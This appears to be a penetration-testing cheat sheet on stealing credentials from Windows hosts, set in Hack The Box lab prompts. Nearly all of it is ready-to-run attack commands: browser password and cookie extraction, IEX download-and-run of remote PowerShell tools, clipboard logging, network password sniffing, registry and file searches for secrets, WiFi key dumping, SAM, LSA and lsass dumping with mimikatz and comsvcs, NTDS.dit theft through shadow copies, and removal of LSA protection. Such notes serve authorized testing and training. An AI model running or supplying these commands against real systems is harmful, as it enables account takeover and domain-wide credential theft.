Credentials Attacks On Windows

Web Credentials

PS C:\> start lazagne.exe all
PS C:\> .\\SharpChrome.exe logins /unprotect


PS C:\> vaultcmd /list
PS C:\> vaultcmd /listcreds:"Web Credentials" /all

#-----------EDGE---------------------------------
#Extract credentials from Edge Browswer
PS C:\> (Get-Content "C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /encryptedkey:<SNIF>e4x8+n0VDX82CffsyVmOzvSraXQ== /unprotect

#-----------Firefox-------------------------------
#Extract passwords from profiles of Mozilla
Intrusionz3r0@htb[/htb]$ python firefox_decrypt.py /folder/containing/profiles.ini/

#Cookies
#Path: %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d

#---------Chromium--------------------------------
PS C:\> (Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz  dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect

#Cookies
#Path: %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies
PS C:\> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\> copy "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies"
PS C:\> Invoke-SharpChromium -Command "cookies slack.com"

Credentials manager

#Listing Saved Credentials
PS C:\> cmdkey /list

#Enumerate windows credentials
PS C:\> vaultcmd /listcreds:"Windows Credentials" /all

PS C:\> C:\Temp>SharpDPAPI.exe machinecredentials

#Find credentials store
PS C:\> C:\Users\<user>\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx/556a2412-xxxx-4ccf-b721-e6a0b4f90407

#1. Decrypt master key
mimikatz \"dpapi::masterkey /in:C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\\556a2412-xxxx-4ccf-b721-e6a0b4f90407 /password:MYPASSWORD123 /protected \" exit

#2. Extract credentials
mimikatz \"dpapi::cred /in:C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Credentials\\C8XXXXXXXXXXXXXXXXXXXXXXXX1B9 /masterkey:d9a<SNIF>f319e9c84

DPAPI

#Using Donpapi (best options)
donpapi collect -u 'John.ford' -H 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' --collectors All --target vdixx.eu-xxxx.vl -d eu-xxxx.vl --dc-ip xx.xx.xx.xx

#Using netexec
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi cookies
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi nosystem
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --local-auth --dpapi nosystem

Search Credentials

Extract credentials using SessionGopher

PS C:\\htb> Import-Module .\\SessionGopher.ps1
PS C:\\Tools> Invoke-SessionGopher -Target WINLPE-SRV01

Sniff passwords and hashes with net-creds

Intrusionz3r0@htb[/htb]$ sudo python net-creds.py
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0

Search credentials on the registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Search for file contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
dir | select-string "password"
PS C:\\htb> Get-ChildItem -Path C:\\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue
PS C:\\htb> Get-ChildItem -Path "C:\\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line

Search for filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
C:\\htb> dir \\confidentials.txt /s /p
PS C:\\htb> Get-ChildItem -Path C:\\ -Filter "confidentials.txt" -Recurse

Passwords in unattend.xml

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Retrieve Putty Credentials from registry

PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions
PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions\\<value>

PowerShell

Powershell History File

PS C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\> cat (Get-PSReadlineOption).HistorySavePath

Powershell Transcript

PS C:\> gc C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
PS C:\> gc C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt

Recover credentials on PowerShell scripts

First Option:

PS C:\\htb> $credential = Import-Clixml -Path 'C:\\scripts\\pass.xml'
PS C:\\htb> $credential.GetNetworkCredential().username
PS C:\\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!

Second Option

PS C:\> $user = "Administrator"
PS C:\> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
PS C:\> cred = New-Object System.Management.Automation.PSCredential($user, $pass)
PS C:\> $cred.GetNetworkCredential() | Format-List

Alternate Data Stream

Retrieve Credentials on data streams

PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag

Clipboard

Monitor Clipboard

PS C:\\htb> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1>')
PS C:\\htb> Invoke-ClipboardLogger

Sensitive Files

IIS Web config

PS C:\> Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Retrieve password from Wireless

C:\\htb> netsh wlan show profile
C:\\htb> netsh wlan show profile <ssid-name> key=clear

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

Sticky notes

#Path: C:\\Users\\<user>\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite
Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;"
Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal

PS C:\\htb> Set-ExecutionPolicy Bypass -Scope Process
PS C:\\htb> cd .\\PSSQLite\\
PS C:\\htb> Import-Module .\\PSSQLite.psd1
PS C:\\htb> $db = 'C:\\Users\\htb-student\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite'
PS C:\\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Copying SAM SYSTEM and Security

C:\\WINDOWS\\system32> reg.exe save hklm\\sam C:\\sam.save
C:\\WINDOWS\\system32> reg.exe save hklm\\system C:\\system.save
C:\\WINDOWS\\system32> reg.exe save hklm\\security C:\\security.save

Dumping SAM and SYSTEM

Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16  save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL 
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam

Dump LSA

Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa

Dump lsass

#Finding LSASS PID in cmd
C:\\Windows\\system32> tasklist /svc

#Finding LSASS PID in Powershell
PS C:\\Windows\\system32>  Get-Process lsass
#----------------------------------------

#Create lssas file
PS C:\\Windows\\system32> rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full

#dump the lsass.dmp file.
Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp 
C:\\Windows\\system32>  .\\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit

Dump lsass using RDP session

Dump NTDS.dit

To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.


#List the localgroups
C:\\> net localgroup

#Check user permission.
C:\\> net user bwilliamson

#Check the shadow copy
C:\\> vssadmin CREATE SHADOW /For=C:

#Move the file.
C:\\> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit

#Extracting Credentials from NTDS.dit
PS C:\\htb> Import-Module .\\DSInternals.psd1
PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM
PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key

#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

# Fastest way to steal the NTDS.
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds

Mimikatz

# Dump the local SAM database 
mimikatz lsadump::sam

#Dump LSA 
mimikatz lsadump::lsa /inject

#Dump secrets
mimikatz lsadump::secrets

# Dump the logon passwords
mimikatz sekurlsa::logonpasswords

# Dump the encryption keys used by Kerberos.
mimikatz sekurlsa::ekeys

# Dump Domain Cached Credentials
mimikatz lsadump::cache

#Dump secrets trust
mimikatz lsadump::sam

Bypassing LSA protection

Error: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords

PreviousEnumeration NextKerberos

Last updated 6 months ago

hashtagWeb Credentials

hashtagCredentials manager

hashtagDPAPI

hashtagSearch Credentials

hashtagExtract credentials using SessionGopher

hashtagSniff passwords and hashes with net-creds

hashtagSearch credentials on the registry

hashtagSearch for file contents

hashtagSearch for filename

hashtagPasswords in unattend.xml

hashtagRetrieve Putty Credentials from registry

hashtagPowerShell

hashtagPowershell History File

hashtagPowershell Transcript

hashtagRecover credentials on PowerShell scripts

hashtagAlternate Data Stream

hashtagRetrieve Credentials on data streams

hashtagClipboard

hashtagMonitor Clipboard

hashtagSensitive Files

hashtagIIS Web config

hashtagRetrieve password from Wireless

hashtagSticky notes

hashtagCopying SAM SYSTEM and Security

hashtagDumping SAM and SYSTEM

hashtagDump LSA

hashtagDump lsass

hashtagDump lsass using RDP session

hashtagDump NTDS.dit

hashtagMimikatz

hashtagBypassing LSA protection